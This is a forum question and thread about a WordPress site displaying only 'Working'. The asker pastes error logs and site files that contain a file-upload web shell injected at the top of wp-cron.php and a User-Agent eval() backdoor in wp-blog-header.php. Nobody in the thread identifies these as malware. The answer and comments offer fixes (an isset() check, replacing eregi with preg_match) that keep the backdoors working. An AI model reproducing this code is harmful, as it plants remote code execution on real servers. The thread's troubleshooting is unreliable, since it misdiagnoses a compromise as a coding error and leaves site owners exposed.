# Undefined index: alqnas in public_html/wp-cron.php on line 3

Tags: wordpress, error-handling, cron, server

I am having a wordpress website here - ludhianathefilmcity.com/

I haven't made any major change in website that deals with website files . I have checked my Error Logs and Following line of error exist in error_log . Some last lines of My Error Log Is as Follows  -

```
[27-Dec-2015 00:00:36 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[27-Dec-2015 14:12:50 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[28-Dec-2015 00:54:52 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[28-Dec-2015 10:46:57 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[28-Dec-2015 21:20:54 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[29-Dec-2015 07:31:20 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[29-Dec-2015 17:41:16 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[30-Dec-2015 03:48:06 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[30-Dec-2015 04:39:11 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[30-Dec-2015 06:10:05 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[30-Dec-2015 16:54:55 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[30-Dec-2015 23:54:55 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 05:12:49 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 06:58:40 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 13:50:08 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 13:57:43 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 13:58:45 Etc/GMT] PHP Notice:  Undefined index: alqnas in /home/ludhiana/public_html/wp-cron.php on line 3
[31-Dec-2015 14:39:48 Etc/GMT] PHP Deprecated:  Function eregi() is deprecated in /home/ludhiana/public_html/wp-blog-header.php on line 7
```

I am unable to Understand what is possible Error in Website

When I Open Website It only displays "Working" nothing else and I am able to Login to Dashboard and Same theme is selected there and all files are available on Cpanel FileManager

wp-cron.php File Code

```
<?php

$alqnas  = $_GET['alqnas'];
if($alqnas == 'eslam'){
$alqnasshell = $_FILES['file']['name'];
$alqnaseslam  = $_FILES['file']['tmp_name'];
echo "<form method='POST' enctype='multipart/form-data'>
    <input type='file'name='file' />
    <input type='submit' value='upload shell' />
</form>";
move_uploaded_file($alqnaseslam,$alqnasshell); 
}
?>


<?php
/**
 * WordPress Cron Implementation for hosts, which do not offer CRON or for which
 * the user has not set up a CRON job pointing to this file.
 *
 * The HTTP request to this file will not slow down the visitor who happens to
 * visit when the cron job is needed to run.
 *
 * @package WordPress
 */

ignore_user_abort(true);

if ( !empty($_POST) || defined('DOING_AJAX') || defined('DOING_CRON') )
    die();

/**
 * Tell WordPress we are doing the CRON task.
 *
 * @var bool
 */
define('DOING_CRON', true);

if ( !defined('ABSPATH') ) {
    /** Set up WordPress environment */
    require_once( dirname( __FILE__ ) . '/wp-load.php' );
}

// Uncached doing_cron transient fetch
function _get_cron_lock() {
    global $wpdb;

    $value = 0;
    if ( wp_using_ext_object_cache() ) {
        // Skip local cache and force refetch of doing_cron transient in case
        // another processs updated the cache
        $value = wp_cache_get( 'doing_cron', 'transient', true );
    } else {
        $row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) );
        if ( is_object( $row ) )
            $value = $row->option_value;
    }

    return $value;
}

if ( false === $crons = _get_cron_array() )
    die();

$keys = array_keys( $crons );
$gmt_time = microtime( true );

if ( isset($keys[0]) && $keys[0] > $gmt_time )
    die();

$doing_cron_transient = get_transient( 'doing_cron');

// Use global $doing_wp_cron lock otherwise use the GET lock. If no lock, trying grabbing a new lock.
if ( empty( $doing_wp_cron ) ) {
    if ( empty( $_GET[ 'doing_wp_cron' ] ) ) {
        // Called from external script/job. Try setting a lock.
        if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) )
            return;
        $doing_cron_transient = $doing_wp_cron = sprintf( '%.22F', microtime( true ) );
        set_transient( 'doing_cron', $doing_wp_cron );
    } else {
        $doing_wp_cron = $_GET[ 'doing_wp_cron' ];
    }
}

// Check lock
if ( $doing_cron_transient != $doing_wp_cron )
    return;

foreach ( $crons as $timestamp => $cronhooks ) {
    if ( $timestamp > $gmt_time )
        break;

    foreach ( $cronhooks as $hook => $keys ) {

        foreach ( $keys as $k => $v ) {

            $schedule = $v['schedule'];

            if ( $schedule != false ) {
                $new_args = array($timestamp, $schedule, $hook, $v['args']);
                call_user_func_array('wp_reschedule_event', $new_args);
            }

            wp_unschedule_event( $timestamp, $hook, $v['args'] );

            /**
             * Fires scheduled events.
             *
             * @since 2.1.0
             *
             * @param string $hook Name of the hook that was scheduled to be fired.
             * @param array $v['args'] The arguments to be passed to the hook.
             */
            do_action_ref_array( $hook, $v['args'] );

            // If the hook ran too long and another cron process stole the lock, quit.
            if ( _get_cron_lock() != $doing_wp_cron )
                return;
        }
    }
}

if ( _get_cron_lock() == $doing_wp_cron )
    delete_transient( 'doing_cron' );

die();
```

**My Wordpress index.php File**

```
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
//define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
```

**wp-blogheader.php File**

```
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }
if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . '/wp-load.php' );

    wp();

    require_once( ABSPATH . WPINC . '/template-loader.php' );

}

?>
```

Comment: `if(isset($_GET['alqnas'])) { $alqnas  = $_GET['alqnas']; }`

Comment: it is not making any difference

Comment: And I don't think it is duplicate . I think it is some different problem . site is in wordpress

Comment: I have set PHP Version of Website to 5.2 No Entry appears in Error_log file But site is still not working

Comment: I have recently Tried of New Wordpress Installing under http://www.ludhianathefilmcity.com/web/ this url but it has started the installation of wordpress but then installation break and shows 500 error and there is nothing in error_log

Answer (score 1):

You should check the existence of the $_GET['alqnas'] variable before using it :

```
$alqnas  = isset($_GET['alqnas']) ? (string) $_GET['alqnas'] : '';
```

instead of

```
$alqnas  = $_GET['alqnas'];
```

Comment: I Updated this thing but it is not making any difference and i have not personally added this line of code don't know how this line of code is in wp-cron.php

Comment: you still have the undefined index error in your logs ? (more than what you already had) or there is no error anymore but nothing happens ?

Comment: My error logs is having this error now 

[31-Dec-2015 14:39:48 Etc/GMT] PHP Deprecated:  Function eregi() is deprecated in /home/ludhiana/public_html/wp-blog-header.php on line 7

Comment: that is another problem, eregi is deprecated since php5.3, you could at least have google that. Replace eregi with preg_match

Comment: i replaced the line of code with this one if (preg_match ("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

Comment: But this is all autogenerated code i have not written any code in wordpress  Can yo tell me any reason for these 

I don't know if my partner developer made any changes

Comment: How would I know ? I don't know your project, its history or else. Ask whoever worked on the project. What could have happened is that somebody changed PHP version on the server ?

Comment: I have set PHP Version to 5.5 But still getting   [31-Dec-2015 15:06:04 Etc/GMT] PHP Deprecated:  Function eregi() is deprecated in /home/ludhiana/public_html/wp-blog-header.php on line 7

Comment: eregi is deprecated since PHP 5.3 like I said in a previous comment

Comment: I have set PHP Version of Website to 5.2 No Entry appears in Error_log file But site is still not working